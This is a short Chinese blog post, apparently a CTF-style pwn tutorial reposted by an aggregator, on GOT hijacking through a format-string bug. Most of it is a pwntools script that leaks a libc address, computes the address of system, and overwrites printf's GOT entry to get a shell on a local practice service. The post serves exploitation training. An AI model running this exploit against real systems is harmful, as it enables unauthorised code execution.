Pwn_11 Got 劫持

Posted 歇马

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Pwn_11 Got 劫持相关的知识,希望对你有一定的参考价值。

比如说 把puts(str)的.got.plt的地址的值改为system函数地址

格式化字符串的综合利用

  • 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址
  • 利用libc基地址+偏移地址 可以知道其他函数地址
  • 利用任意地址写入,从而配合got hijacking更改已有函数地址

  
from pwn import *

r = remote(\'127.0.0.1\',4000)

libc_start_got = 0x804a01c
libc = ELF(\'/lib/i386-linux-gnu/libc.so.6\')
libc_offsset = libc.symbols[\'__libc_start_main\']

r.sendline(p32(libc_start_got)+\'#\'+\'%5$s\'+\'#\')

r.recvuntil(\'#\')
libc_base = u32(r.recvuntil(\'#\')[:4]) - libc_offsset

printf_got = 0x804a00c
system_off = libc.symbols[\'system\']
system = libc_base + system_off

r.sendline(fmtstr_payload(5,{printf_got:system}))

r.interactive()

 

以上是关于Pwn_11 Got 劫持的主要内容,如果未能解决你的问题,请参考以下文章

PWN通用技巧

pwn入门参考资源

1.pwn基础总结

PHP Session 劫持安全

PHP会话劫持[重复]

Pwn-10月25-Hitcon